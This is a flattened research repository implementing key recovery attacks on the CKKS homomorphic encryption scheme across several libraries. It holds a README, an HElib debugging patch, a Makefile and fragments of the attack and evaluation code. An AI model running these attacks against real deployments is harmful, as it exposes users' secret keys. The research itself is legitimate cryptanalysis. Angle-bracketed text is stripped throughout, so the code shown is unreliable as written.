├── .gitignore ├── README.md ├── patches └── 0001-local-debugging-changes.patch └── src ├── Makefile ├── attack.cpp ├── eval.cpp ├── eval.h ├── helib_attack.cpp ├── helib_utils.cpp ├── helib_utils.h ├── lattigo ├── go.mod └── main.go ├── lattigo_new ├── go.mod └── main.go ├── ntl_utils.cpp ├── ntl_utils.h ├── palisade.h ├── palisade_attack.cpp ├── palisade_attack_test.cpp ├── palisade_utils.cpp ├── palisade_utils.h ├── rns_attack.cpp ├── seal_attack.cpp ├── seal_utils.cpp └── seal_utils.h /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Compiled Static libraries 20 | *.lai 21 | *.la 22 | *.a 23 | *.lib 24 | 25 | # Executables 26 | *.exe 27 | *.out 28 | *.app 29 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Key recovery attacks against the CKKS homomorphic approximate encryption scheme 2 | 3 | This repository contains experimental program code implementing our key recovery attacks against the CKKS scheme. Current implementations work with libraries HEAAN, PALISADE, SEAL, HElib, RNS-HEAAN, and Lattigo. 4 | 5 | ## Build instructions (for all libraries except Lattigo) 6 | 7 | Makefile expects the HEAAN library to be installed in the current directory. 8 | Install HEAAN and create a symbolic link. For example, if HEAAN is cloned 9 | from github to `/local/HEAAN`, then use this path as ``. HEAAN 10 | depends on NTL, which is assumed to have been installed in `/usr/local` 11 | 12 | ln -s ./ 13 | make attack 14 | 15 | Similarly, to build the attack for RNS-HEAAN, install RNS-HEAAN (FullRNS-HEAAN) 16 | and create a symbolic link to the current directory. Makefile expects the library 17 | files (.a or .so) are under `./FullRNS-HEAAN/lib` 18 | 19 | ln -s ./ 20 | make rns_attack 21 | 22 | 23 | For PALISADE, SEAL, and HElib, the Makefile expects their typical installations 24 | into `/usr/local`. Otherwise, you can modify the variable `PALISADE`, `_INCLUDE`, 25 | and `_LIBS` (`X` being `SEAL` or `HELIB`), in Makefile to point to the root include 26 | directory and library directory. These programs also depend on NTL (installed 27 | under `/usr/local` or `/usr`). Then build the executables as: 28 | 29 | make palisade_attack seal_attack helib_attack 30 | 31 | Whenever possible, optimized build (e.g. -O3) with parallelization enabled is 32 | preferred for better running times. 33 | 34 | ## Special note for HElib 35 | 36 | The HElib's `Ctxt` class does not provide a public interface for accessing the 37 | component Double-CRT polynomials ("parts" in HElib's terminology). We included 38 | a patch (patches/0001-local-debugging-changes.patch) to add an accessor function `getPart()` 39 | to `Ctxt` and to add a global static variable `decrypted_ptxt_` to store the decrypted 40 | polynomial (for checking encoding error). 41 | 42 | 43 | ## How to run the experiment programs 44 | 45 | In general, all programs expect command line arguments to specify the type of 46 | homomorphic computation ``, the ring dimension ``, the initial scaling 47 | factor ``, the upper bound on the random plaintext numbers ``, and the 48 | maximal polynomial degree to evaluate ``. The homomorphic computation 49 | argument `` can be one of the following: 50 | 51 | noop, variance, sigmoid, exp 52 | 53 | The orders of the arguments are slightly different due to the differences in 54 | how parameters are set up in these libraries. So here are the details: 55 | 56 | 57 | For HEAAN, run the attack program as: 58 | 59 | ./attack 60 | # logN is hard coded in HEAAN's Params.h 61 | # is the number of runs to execute, for example, 1 62 | 63 | For PALISADE, run palisade_attack as: 64 | 65 | ./palisade_attack 66 | 67 | For SEAL, run seal_attack as: 68 | 69 | ./seal_attack 70 | 71 | 72 | For HElib, run helib_attack as: 73 | 74 | ./helib_attack 75 | 76 | 77 | For RNS-HEAAN, run rns_attack as: 78 | 79 | ./rns_attack 80 | # L is the maximal level of computation, for example, 10 81 | 82 | 83 | For all programs, the parameter `` is ignored when `` is noop or variance. 84 | These programs will check and print out the encoding error, and also print out 85 | if the secret key is successfully recovered at the end of a run. 86 | For HEAAN, since power-of-2 modulus is used, with certain probability an inverse 87 | may not exist for the a part of a ciphertext, but the encoding error indicates 88 | if gaussian elimination can be used when collecting a few more ciphertexts. 89 | 90 | 91 | ## How to build and run the attack program with Lattigo 92 | 93 | Lattigo is written in the GO programming language, and it uses a different programming 94 | environment, so it is a bit different to build and run the attack program than with 95 | other libraries. The source code of the Lattigo version of our attack program is placed 96 | under `src/lattigo`, and it is compatible with the Lattigo version v2.0.0. To build and 97 | run it, first retrieve the Lattigo source tree from https://github.com/ldsec/lattigo, 98 | and check out version v2.0.0: 99 | 100 | git checkout -b v2.0.0 101 | 102 | Then modify `go.mod` under `src/lattigo` by replacing "/scratch/lattigo" with the path 103 | to the lattigo source tree on your computer. Now, we are ready to build the attack program: 104 | 105 | cd src/lattigo 106 | go build 107 | 108 | This should build an executable `ckks_attack`. To run, simply execute `./ckks_attack`. 109 | 110 | Lattigo implemented some mitigation strategies in the branch `dev_indCPA+_mitigation`, 111 | which is based on the API in version v2.1.0. A modified attack program compatible with 112 | this branch can be found in `src/lattigo_new`, and it can be built in the similr way. 113 | Note that the parameters to encoder.DecodeAndRound should be chosen carefully for the mitigation to work. 114 | 115 | 116 | 117 | -------------------------------------------------------------------------------- /patches/0001-local-debugging-changes.patch: -------------------------------------------------------------------------------- 1 | From a1ec3e984dbcc2ec600521ff004da4ae70a8c8ec Mon Sep 17 00:00:00 2001 2 | From: a@a.com 3 | Date: Mon, 14 Sep 2020 00:03:01 -0700 4 | Subject: [PATCH] local debugging changes 5 | 6 | --- 7 | include/helib/Ctxt.h | 2 ++ 8 | include/helib/keys.h | 2 ++ 9 | include/helib/norms.h | 6 ++++++ 10 | src/Makefile | 2 +- 11 | src/keys.cpp | 8 ++++++- 12 | src/norms.cpp | 50 ++++++++++++++++++++++++++++++++++++++++--- 13 | 6 files changed, 65 insertions(+), 5 deletions(-) 14 | 15 | diff --git a/include/helib/Ctxt.h b/include/helib/Ctxt.h 16 | index dcd70fa..ce1f7cf 100644 17 | --- a/include/helib/Ctxt.h 18 | +++ b/include/helib/Ctxt.h 19 | @@ -400,6 +400,8 @@ public: 20 | return privateAssign(other); 21 | } 22 | 23 | + CtxtPart const& getPart(size_t i) const { return parts[i]; } 24 | + 25 | bool operator==(const Ctxt& other) const { return equalsTo(other); } 26 | bool operator!=(const Ctxt& other) const { return !equalsTo(other); } 27 | 28 | diff --git a/include/helib/keys.h b/include/helib/keys.h 29 | index 64dd8a6..1686e47 100644 30 | --- a/include/helib/keys.h 31 | +++ b/include/helib/keys.h 32 | @@ -322,6 +322,8 @@ double RLWE(DoubleCRT& c0, 33 | //! Same as RLWE, but assumes that c1 is already chosen by the caller 34 | double RLWE1(DoubleCRT& c0, const DoubleCRT& c1, const DoubleCRT& s, long p); 35 | 36 | +extern NTL::ZZX decrypted_ptxt_; 37 | + 38 | } // namespace helib 39 | 40 | #endif // HELIB_KEYS_H 41 | diff --git a/include/helib/norms.h b/include/helib/norms.h 42 | index 3c367e9..e490f5f 100644 43 | --- a/include/helib/norms.h 44 | +++ b/include/helib/norms.h 45 | @@ -123,6 +123,12 @@ void CKKS_embedInSlots(zzX& f, 46 | const PAlgebra& palg, 47 | double scaling); 48 | 49 | +//! Encode into ZZX to avoid integer overflow 50 | +void CKKS_embedInSlots(NTL::ZZX& f, 51 | + const std::vector& v, 52 | + const PAlgebra& palg, 53 | + double scaling); 54 | + 55 | } // namespace helib 56 | 57 | #endif // ifndef HELIB_NORMS_H 58 | diff --git a/src/Makefile b/src/Makefile 59 | index d9e20cd..200e2aa 100644 60 | --- a/src/Makefile 61 | +++ b/src/Makefile 62 | @@ -16,7 +16,7 @@ AR = ar 63 | ARFLAGS=rv 64 | GMP=-lgmp 65 | NTL=-lntl 66 | -COPT=-g -O2 -march=native 67 | +COPT=-g -O3 -march=native 68 | INC_HELIB=-I../include/ 69 | LEGACY_TESTS=../misc/legacy_tests/ 70 | 71 | diff --git a/src/keys.cpp b/src/keys.cpp 72 | index 4e5910b..aa20f39 100644 73 | --- a/src/keys.cpp 74 | +++ b/src/keys.cpp 75 | @@ -21,7 +21,7 @@ 76 | #include 77 | #include 78 | #include 79 | - 80 | +#include 81 | namespace helib { 82 | 83 | /******** Utility function to generate RLWE instances *********/ 84 | @@ -1109,6 +1109,10 @@ void SecKey::Decrypt(NTL::ZZX& plaintxt, 85 | 86 | f = plaintxt; // f used only for debugging 87 | 88 | + 89 | + decrypted_ptxt_ = plaintxt; 90 | + 91 | + 92 | if (isCKKS()) 93 | return; // CKKS encryption, nothing else to do 94 | // NOTE: calling application must still divide by ratFactor after decoding 95 | @@ -1345,4 +1349,6 @@ void readSecKeyBinary(std::istream& str, SecKey& sk) 96 | assertEq(eyeCatcherFound, 0, "Could not find post-secret key eyecatcher"); 97 | } 98 | 99 | +NTL::ZZX decrypted_ptxt_; 100 | + 101 | } // namespace helib 102 | diff --git a/src/norms.cpp b/src/norms.cpp 103 | index ca7f0ff..7aac2d7 100644 104 | --- a/src/norms.cpp 105 | +++ b/src/norms.cpp 106 | @@ -22,7 +22,7 @@ 107 | #include 108 | #include 109 | #include 110 | - 111 | +#include 112 | namespace helib { 113 | 114 | #define USE_HALF_FFT (1) 115 | @@ -603,12 +603,56 @@ void CKKS_embedInSlots(zzX& f, 116 | 117 | hfft.fft.apply(&buf[0]); 118 | f.SetLength(m / 2); 119 | - for (long i : range(m / 2)) 120 | - f[i] = std::round(MUL(buf[i], pow[i]).real() * scaling); 121 | + for (long i : range(m / 2)) { 122 | + double fi = std::round(MUL(buf[i], pow[i]).real() * scaling); 123 | + if (fi > std::pow(2,63) || fi < std::pow(2,63)*(-1)) { 124 | + Warning("overflow in converting to zzX"); 125 | + } 126 | + f[i] = fi; 127 | + } 128 | 129 | normalize(f); 130 | } 131 | 132 | + 133 | +void CKKS_embedInSlots(NTL::ZZX& f, 134 | + const std::vector& v, 135 | + const PAlgebra& palg, 136 | + double scaling) 137 | + 138 | +{ 139 | + long v_sz = v.size(); 140 | + long m = palg.getM(); 141 | + 142 | + if (!(palg.getP() == -1 && palg.getPow2() >= 2)) 143 | + throw LogicError("bad args to CKKS_canonicalEmbedding"); 144 | + 145 | + std::vector buf(m / 2, cx_double(0)); 146 | + for (long i : range(m / 4)) { 147 | + long j = palg.ith_rep(i); 148 | + long ii = m / 4 - i - 1; 149 | + if (ii < v_sz) { 150 | + buf[j >> 1] = std::conj(v[ii]); 151 | + buf[(m - j) >> 1] = v[ii]; 152 | + } 153 | + } 154 | + 155 | + const half_FFT& hfft = palg.getHalfFFTInfo(); 156 | + const cx_double* pow = &hfft.pow[0]; 157 | + 158 | + scaling /= (m / 2); 159 | + // This is becuase DFT^{-1} = 1/(m/2) times a DFT matrix for conj(V) 160 | + 161 | + hfft.fft.apply(&buf[0]); 162 | + f.SetLength(m / 2); 163 | + for (long i : range(m / 2)) { 164 | + double fi = std::round(MUL(buf[i], pow[i]).real() * scaling); 165 | + f[i] = NTL::to_ZZ(fi); 166 | + } 167 | + 168 | + f.normalize(); 169 | +} 170 | + 171 | // === obsolete versions of canonical embedding and inverse === 172 | 173 | // These are less efficient, and seem to have some logic errors. 174 | -- 175 | 2.17.1 176 | 177 | -------------------------------------------------------------------------------- /src/Makefile: -------------------------------------------------------------------------------- 1 | HEAAN=./HEAAN/HEAAN 2 | HEAAN_LIBS=-L$(HEAAN)/lib -lHEAAN -Wl,-rpath=$(HEAAN)/lib -lntl -Wl,-rpath=/usr/local/lib -lgmp -lm 3 | HEAAN_INCLUDE=-I$(HEAAN)/src 4 | 5 | FRNSHEAAN=./FullRNS-HEAAN 6 | FRNSHEAAN_LIBS=-L$(FRNSHEAAN)/lib -lFRNSHEAAN -Wl,-rpath=$(FRNSHEAAN)/lib -lntl -Wl,-rpath=/usr/local/lib -lgmp -lm 7 | FRNSHEAAN_INCLUDE=-I$(FRNSHEAAN)/src 8 | 9 | PALISADE=/usr/local/include/palisade 10 | PALISADE_INCLUDE=-I$(PALISADE) -I$(PALISADE)/core -I$(PALISADE)/pke 11 | PALISADE_LIBS=-L/usr/local/lib -lPALISADEcore -lPALISADEpke -Wl,-rpath=/usr/local/lib -lntl 12 | 13 | SEAL_INCLUDE=-I/usr/local/include/SEAL-3.5 14 | SEAL_LIBS=-L/usr/local/lib -lseal-3.5 -lz -Wl,-rpath=/usr/local/lib -lntl 15 | 16 | HELIB_INCLUDE=-I/usr/local/include 17 | HELIB_LIBS=-Wl,-rpath=/usr/local/lib -L/usr/local/lib -lhelib -lntl -lgmp 18 | 19 | all: attack palisade_attack seal_attack helib_attack 20 | 21 | attack: attack.cpp eval.h eval.cpp ntl_utils.h ntl_utils.cpp 22 | g++ attack.cpp eval.cpp ntl_utils.cpp -o attack -std=c++11 -O3 -pthread $(HEAAN_LIBS) $(HEAAN_INCLUDE) 23 | 24 | rns_attack: rns_attack.cpp eval.h eval.cpp ntl_utils.h ntl_utils.cpp 25 | g++ rns_attack.cpp eval.cpp ntl_utils.cpp -o rns_attack -std=c++11 -fopenmp -O3 -pthread $(FRNSHEAAN_LIBS) $(FRNSHEAAN_INCLUDE) 26 | 27 | palisade_attack: palisade_attack.cpp palisade_utils.cpp eval.h eval.cpp 28 | g++ palisade_attack.cpp palisade_utils.cpp eval.cpp -o palisade_attack -std=c++11 -O3 $(PALISADE_LIBS) $(PALISADE_INCLUDE) 29 | 30 | seal_attack: seal_attack.cpp eval.h eval.cpp seal_utils.h seal_utils.cpp 31 | g++ seal_attack.cpp seal_utils.cpp eval.cpp -o seal_attack -std=c++17 -fopenmp -O3 -pthread $(SEAL_LIBS) $(SEAL_INCLUDE) 32 | 33 | helib_attack: helib_attack.cpp helib_utils.h helib_utils.cpp ntl_utils.h ntl_utils.cpp eval.h eval.cpp 34 | g++ helib_attack.cpp helib_utils.cpp ntl_utils.cpp eval.cpp -o helib_attack -std=c++14 -O3 -pthread $(HELIB_LIBS) $(HELIB_INCLUDE) 35 | 36 | clean: 37 | rm -f attack palisade_attack seal_attack helib_attack 38 | 39 | .PHONY: all clean 40 | 41 | -------------------------------------------------------------------------------- /src/attack.cpp: -------------------------------------------------------------------------------- 1 | #include "HEAAN.h" 2 | #include "StringUtils.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include "eval.h" 10 | #include "ntl_utils.h" 11 | 12 | using namespace std; 13 | using namespace NTL; 14 | 15 | // Convert vector of integers to NTL polynomial 16 | void NTLpolyQ(ZZ_pE & pX, const ZZ* vecZ, const int n) { 17 | ZZX zX; 18 | for (int i=0; i(conv(zX)); 22 | } 23 | 24 | #define Conv2toZ(p) (conv(conv(p))) 25 | #define ConvZtoQ(p) (conv(conv(p))) 26 | #define Conv2toQ(p) (ConvZtoQ(Conv2toZ(p))) 27 | #define ConvQtoZ(q) (conv(conv(q))) 28 | #define ConvZto2(q) (conv(conv(q))) 29 | #define ConvQto2(q) (ConvZto2(ConvQtoZ(q))) 30 | #define ConvQto2X(q) (conv(ConvQtoZ(q))) 31 | 32 | // Compute the L-infty norm of aX - bX 33 | ZZ maxDiff(ZZ const* aX, ZZ const* bX, int n, ZZ const& modQ) { 34 | ZZ m = ZZ::zero(); 35 | ZZ hQ = modQ / 2; 36 | for (int i=0; i= hQ) { 39 | d = d - modQ; 40 | } 41 | d = abs(d); 42 | if (m *val_input = randomComplexVector(n, ptBound); // use all slots 80 | 81 | // Key generation 82 | SecretKey secretKey(ring); 83 | Scheme scheme(secretKey, ring); 84 | 85 | if (hc == HC_VARIANCE) { 86 | // Add rotation keys when computing variance 87 | for (int i=1; i<=n/2; i*=2) { 88 | scheme.addLeftRotKey(secretKey, i); // for left shift 1< 3 | #include 4 | 5 | #include 6 | #include 7 | 8 | void evalPlainAdd(std::vector & res, 9 | std::vector const& in0, std::vector const& in1) { 10 | size_t len = std::min(in0.size(), in1.size()); 11 | res.resize(len); 12 | for (size_t i = 0; i < len; i++) { 13 | res[i] = in0[i] + in1[i]; 14 | } 15 | } 16 | 17 | 18 | void evalPlainMul(std::vector & res, 19 | std::vector const& in0, std::vector const& in1) { 20 | size_t len = std::min(in0.size(), in1.size()); 21 | res.resize(len); 22 | for (size_t i = 0; i < len; i++) { 23 | res[i] = in0[i] * in1[i]; 24 | } 25 | } 26 | 27 | void evalPlainNegate(std::vector & res, std::vector const& in) { 28 | size_t len = in.size(); 29 | res.resize(len); 30 | for (size_t i = 0; i < len; i++) { 31 | res[i] = -in[i]; 32 | } 33 | } 34 | 35 | void evalPlainInverse(std::vector & res, std::vector const& in) { 36 | size_t len = in.size(); 37 | res.resize(len); 38 | for (size_t i = 0; i < len; i++) { 39 | res[i] = 1.0 / in[i]; 40 | } 41 | } 42 | 43 | void evalPlainPowerOf2(std::vector & res, std::vector const& in, size_t logDeg) { 44 | res = in; // copy all the numbers 45 | for (size_t j = 0; j < logDeg; j++) { 46 | for (size_t i = 0; i < in.size(); i++) { 47 | res[i] = res[i] * res[i]; 48 | } 49 | } 50 | } 51 | 52 | void evalPlainPower(std::vector & res, std::vector const& in, size_t deg) { 53 | size_t logDeg = (size_t)floor(std::log2((double)deg)); 54 | size_t remDeg = deg - (1 << logDeg); 55 | evalPlainPowerOf2(res, in, logDeg); 56 | if (remDeg > 0) { 57 | std::vector tmp(in.size()); 58 | evalPlainPower(tmp, in, remDeg); 59 | evalPlainMul(res, res, tmp); 60 | } 61 | } 62 | 63 | void evalPlainAddi(std::vector & res, std::vector const& in, double c) { 64 | res.resize(in.size()); 65 | for (size_t i = 0; i < in.size(); i++) { 66 | res[i] = in[i] + c; 67 | } 68 | } 69 | 70 | void evalPlainMuli(std::vector & res, std::vector const& in, double c) { 71 | res.resize(in.size()); 72 | for (size_t i = 0; i < in.size(); i++) { 73 | res[i] = in[i] * c; 74 | } 75 | } 76 | 77 | std::map> 78 | SpecialFunction::coeffsOf = { 79 | { FuncName::LOG, {0,1,-0.5,1./3,-1./4,1./5,-1./6,1./7,-1./8,1./9,-1./10} }, 80 | { FuncName::EXP, {1,1,0.5,1./6,1./24,1./120,1./720,1./5040,1./40320,1./362880,1./3628800 } }, 81 | { FuncName::SIGMOID, {1./2,1./4,0,-1./48,0,1./480,0,-17./80640,0,31./1451520,0} } 82 | }; 83 | 84 | 85 | void evalPlainFunc(std::vector & res, std::vector const& in, std::vector const& coeff, int evDeg) { 86 | res.resize(in.size(), 0); 87 | res = in; // x 88 | 89 | evalPlainMuli(res, res, coeff[1]); // c_1 x 90 | evalPlainAddi(res, res, coeff[0]); // c_1 x + c_0 91 | 92 | const int deg = evDeg == -1 ? coeff.size()-1 : evDeg; 93 | const int logDeg = (int)floor(std::log2(deg)); 94 | std::vector> basis(logDeg+1); // x^(2^i) for i=0..logDeg 95 | basis[0] = in; // x^(2^0) 96 | for (int j = 0, i = 1; j < logDeg; j++, i++) { 97 | evalPlainPowerOf2(basis[i], in, i); // x^(2^i) 98 | } 99 | 100 | for (int i = 2; i <= deg; i++) { 101 | int k = floor(std::log2(i)); 102 | int r = i - (1 << k); 103 | std::vector tmp = basis[k]; // x^[2^k] 104 | while (r > 0) { 105 | k = floor(std::log2(r)); 106 | r = r - (1 << k); 107 | evalPlainMul(tmp, tmp, basis[k]); 108 | } 109 | evalPlainMuli(tmp, tmp, coeff[i]); // c_i * x^i 110 | evalPlainAdd(res, res, tmp); 111 | } 112 | } 113 | 114 | void evalPlainFunc(std::vector & res, std::vector const& in, SpecialFunction::FuncName name, int evDeg) { 115 | std::vector const& coeff = SpecialFunction::coeffsOf[name]; 116 | evalPlainFunc(res, in, coeff, evDeg); 117 | } 118 | 119 | void evalPlainFunc(std::vector & res, cx_double * in, size_t len, SpecialFunction::FuncName name, int evDeg) { 120 | std::vector vin(in, in+len); 121 | evalPlainFunc(res, vin, name, evDeg); 122 | } 123 | 124 | double largestElm(std::vector> const& vec) { 125 | double m = 0; 126 | for (auto& x : vec) { 127 | if (m < std::abs(x.real())) 128 | m = std::abs(x.real()); 129 | if (m < std::abs(x.imag())) 130 | m = std::abs(x.imag()); 131 | } 132 | return m; 133 | } 134 | 135 | void evalPlainVariance(std::vector & res, std::vector const& in) { 136 | evalPlainMul(res, in, in); 137 | cx_double sum = 0; 138 | for (auto const& x : res) { 139 | sum += x; 140 | } 141 | for (size_t i = 0; i < res.size(); i++) { 142 | res[i] = sum/((double)res.size()); 143 | } 144 | } 145 | 146 | double maxDiff(std::vector const& in0, std::vector const& in1) { 147 | size_t len = std::min(in0.size(), in1.size()); 148 | std::vector tmp(len); 149 | evalPlainNegate(tmp, in1); 150 | evalPlainAdd(tmp, in0, tmp); 151 | return largestElm(tmp); 152 | } 153 | 154 | double relError(std::vector const& in0, std::vector const& in1) { 155 | size_t len = std::min(in0.size(), in1.size()); 156 | std::vector diff(len); 157 | evalPlainNegate(diff, in1); 158 | evalPlainAdd(diff, diff, in0); 159 | double res = 0; 160 | for (size_t i = 0; i < len; i++) { 161 | double tmp = std::fabs(diff[i].real() / in1[i].real()); 162 | if (res < tmp) { 163 | res = tmp; 164 | } 165 | tmp = std::fabs(diff[i].imag() / in1[i].imag()); 166 | if (res < tmp) { 167 | res = tmp; 168 | } 169 | } 170 | return res; 171 | } 172 | 173 | void randomComplexVector(std::vector& array, size_t n, double rad) { 174 | if (rad <= 0) { 175 | rad = 1.0; // default radius = 1 176 | } 177 | array.resize(n); // allocate space 178 | for (auto& x : array) { 179 | long bits = NTL::RandomLen_long(32); // 32 random bits 180 | double r = std::sqrt(bits & 0xffff) / 256.0; // sqrt(uniform[0,1]) 181 | double theta = 182 | 2.0L * M_PI * ((bits >> 16) & 0xffff) / 65536.0; // uniform(0,2pi) 183 | x = std::polar(rad * r, theta); 184 | } 185 | } 186 | 187 | cx_double * randomComplexVector(size_t n, double rad) { 188 | std::vector vec(n); 189 | cx_double * pvec = new cx_double[n]; 190 | randomComplexVector(vec, n, rad); 191 | for (size_t i = 0; i < n; i++) { 192 | pvec[i] = vec[i]; 193 | } 194 | return pvec; 195 | } 196 | 197 | void randomRealVector(std::vector& array, size_t n, double B) { 198 | B = fabs(B); 199 | array.resize(n); // allocate space 200 | for (auto& x : array) { 201 | long bits = NTL::RandomLen_long(32); // 32 random bits 202 | double r = std::sqrt(bits & 0xffff) / 256.0; // sqrt(uniform[0,1]) 203 | double sign = ((bits >> 16) & 0xffff) > 32767 ? 1.0 : -1.0; 204 | x.real(B * r * sign); 205 | x.imag(0); 206 | } 207 | } 208 | cx_double * randomRealVector(size_t n, double rad) { 209 | std::vector vec(n); 210 | cx_double * pvec = new cx_double[n]; 211 | randomRealVector(vec, n, rad); 212 | for (size_t i = 0; i < n; i++) { 213 | pvec[i] = vec[i]; 214 | } 215 | return pvec; 216 | } 217 | 218 | HomomorphicComputation parseHC(char const* v) { 219 | HomomorphicComputation hc = HC_NOOP; // Default noop 220 | if (!v) { 221 | return hc; 222 | } 223 | if (!strcmp(v, "variance")) { 224 | hc = HC_VARIANCE; 225 | } else if(!strcmp(v, "sigmoid")) { 226 | hc = HC_SIGMOID; 227 | } else if(!strcmp(v, "exp")) { 228 | hc = HC_EXP; 229 | } 230 | return hc; 231 | } 232 | 233 | 234 | 235 | 236 | char const* hcString(HomomorphicComputation hc) { 237 | switch (hc) { 238 | case HC_VARIANCE : return "variance"; 239 | case HC_SIGMOID : return "sigmoid"; 240 | case HC_EXP : return "exp"; 241 | default : return "noop"; 242 | } 243 | return "noop"; 244 | } 245 | 246 | void copyTo(std::complex * dst, std::complex const* src, size_t len) { 247 | for (size_t i = 0; i < len; i++) { 248 | dst[i] = src[i]; 249 | } 250 | } 251 | 252 | bool isEqual(std::complex const* m0, std::complex const* m1, size_t len) { 253 | for (size_t i = 0; i < len; i++) { 254 | if (m0[i] != m1[i]) { 255 | std::cout.precision(10); 256 | std::cout << "different @ " << i << " : " 257 | << std::scientific << m0[i] << ", " << m1[i] << std::endl; 258 | return false; 259 | } 260 | } 261 | return true; 262 | } 263 | -------------------------------------------------------------------------------- /src/eval.h: -------------------------------------------------------------------------------- 1 | #ifndef EVAL_H 2 | #define EVAL_H 3 | // Evaluation of functions on plaintext numbers 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | enum HomomorphicComputation { 10 | HC_NOOP, 11 | HC_VARIANCE, 12 | HC_SIGMOID, 13 | HC_EXP 14 | }; 15 | char const* hcString(HomomorphicComputation hc); 16 | HomomorphicComputation parseHC(char const* v); 17 | 18 | typedef std::complex cx_double; 19 | 20 | void evalPlainNegate(std::vector & res, std::vector const& in); 21 | void evalPlainInverse(std::vector & res, std::vector const& in); 22 | 23 | void evalPlainAdd(std::vector & res, 24 | std::vector const& in0, std::vector const& in1); 25 | void evalPlainMul(std::vector & res, 26 | std::vector const& in0, std::vector const& in1); 27 | 28 | void evalPlainPowerOf2(std::vector & res, std::vector const& in, size_t logDeg); 29 | void evalPlainPower(std::vector & res, std::vector const& in, size_t deg); 30 | 31 | void evalPlainAddi(std::vector & res, std::vector const& in, double c); 32 | void evalPlainMuli(std::vector & res, std::vector const& in, double c); 33 | 34 | struct SpecialFunction { 35 | enum FuncName { 36 | LOG, 37 | EXP, 38 | SIGMOID 39 | }; 40 | static std::map> coeffsOf; 41 | // each coefficient vector is indexed from 0, where the entry at index i is the 42 | // coefficient of X^i 43 | }; 44 | 45 | void evalPlainFunc(std::vector & res, std::vector const& in, std::vector const& coeff, int deg = -1); 46 | void evalPlainFunc(std::vector & res, std::vector const& in, SpecialFunction::FuncName name, int deg = -1); 47 | void evalPlainFunc(std::vector & res, cx_double * in, size_t len, SpecialFunction::FuncName name, int deg = -1); 48 | 49 | double largestElm(std::vector const& vec); 50 | double maxDiff(std::vector const& in0, std::vector const& in1); 51 | double relError(std::vector const& in0, std::vector const& in1); 52 | 53 | void evalPlainVariance(std::vector & res, std::vector const& in); 54 | 55 | void randomComplexVector(std::vector& array, size_t n, double rad = 1.0); 56 | cx_double * randomComplexVector(size_t n, double rad = 1.0); 57 | void randomRealVector(std::vector& array, size_t n, double B = 1.0); 58 | cx_double * randomRealVector(size_t n, double B = 1.0); 59 | 60 | #endif // EVAL_H 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /src/helib_attack.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | #include "helib_utils.h" 9 | #include "eval.h" 10 | 11 | // Homomorphic computations 12 | helib::Ctxt evalVariance(helib::EncryptedArrayCx const& ea, helib::Ctxt const& ct, size_t n) { 13 | std::cout << "Compute variance" << std::endl; 14 | 15 | helib::Ctxt ctRes(ct); // copy x 16 | ctRes.multiplyBy(ct); // x^2 17 | ctRes.dropSmallAndSpecialPrimes(); // drop moduli p_i added in modUp 18 | for (int i=2; i<=n; i*=2) { 19 | helib::Ctxt tmp(ctRes); 20 | ea.rotate(tmp, n/i); // tmp = ctRes >> n/i 21 | tmp.dropSmallAndSpecialPrimes(); // drop moduli p_i added in modUp 22 | 23 | showCtxtScale(tmp, "rotate "); 24 | ctRes += tmp; 25 | } 26 | ctRes.multByConstantCKKS(1/(double)n); 27 | return ctRes; 28 | } 29 | 30 | // ctRes[i] = encryption of x^(2^i), where ct = encryption of x, for 0 <= i <= logDeg 31 | void evalPowerOf2(std::vector & ctRes, helib::Ctxt const& ct, int logDeg) { 32 | ctRes.resize(logDeg+1); 33 | ctRes[0] = new helib::Ctxt(ct); // x^(2^0) 34 | for (int i = 1; i <= logDeg; i++) { 35 | ctRes[i] = new helib::Ctxt(*ctRes[i-1]); // x^(2^{i-1}) 36 | ctRes[i]->multiplyBy(*ctRes[i-1]); // x^(2^i) 37 | ctRes[i]->dropSmallAndSpecialPrimes(); 38 | showCtxtScale(*ctRes[i], "powerOf2 "); 39 | } 40 | } 41 | 42 | // A workaround for multiplying by a constant c, where helib would hit a division by 0 error if c<0 43 | void multByConstantCKKSFix(helib::Ctxt & ct, double c) { 44 | if (c<0) { 45 | ct.multByConstantCKKS(-c); 46 | ct.negate(); 47 | } else { 48 | ct.multByConstantCKKS(c); 49 | } 50 | } 51 | 52 | 53 | // Evaluate a polynomial function up to degree evalDeg 54 | helib::Ctxt evalFunction(helib::Ctxt const& ct, size_t n, 55 | std::vector const& coeff, int evalDeg = -1) { 56 | int deg = evalDeg == -1 ? coeff.size()-1 : std::min((size_t)evalDeg, coeff.size() - 1); // assume coeff is not empty 57 | int logDeg = std::floor(std::log2((double)deg)); 58 | std::cout << "evalFunction " << coeff << " to degree " << deg << std::endl; 59 | std::vector ctPow2s(logDeg+1); 60 | evalPowerOf2(ctPow2s, ct, logDeg); 61 | helib::Ctxt ctRes(ct); // copy x 62 | multByConstantCKKSFix(ctRes, coeff[1]); // c_1 * x 63 | ctRes.addConstantCKKS(coeff[0]); // c_1 * x + c_0 64 | showCtxtScale(ctRes, "c_1 * x + c_0 "); 65 | 66 | for (int i = 2; i <= deg; i++) { 67 | if (fabs(coeff[i]) < 1e-27) { 68 | continue; // Too small, skip this term 69 | } 70 | int k = std::floor(std::log2((double)i)); 71 | int r = i - (1 << k); // i = 2^k + r 72 | helib::Ctxt tmp(*ctPow2s[k]); // x^(2^k) 73 | while (r > 0) { 74 | k = std::floor(std::log2((double)r)); 75 | r = r - (1 << k); 76 | tmp.multiplyBy(*ctPow2s[k]); 77 | tmp.dropSmallAndSpecialPrimes(); 78 | } 79 | multByConstantCKKSFix(tmp, coeff[i]); // c_i * x^i 80 | showCtxtScale(tmp, "c_i * x^i "); 81 | ctRes += tmp; 82 | showCtxtScale(ctRes, "add c_i * x^i "); 83 | } 84 | 85 | for (auto &x : ctPow2s) { 86 | delete x; 87 | } 88 | return ctRes; 89 | } 90 | 91 | void test(int logm, int logp, int logQ, double B, int evalDeg, HomomorphicComputation hc) { 92 | // B is the radius of plaintext numbers 93 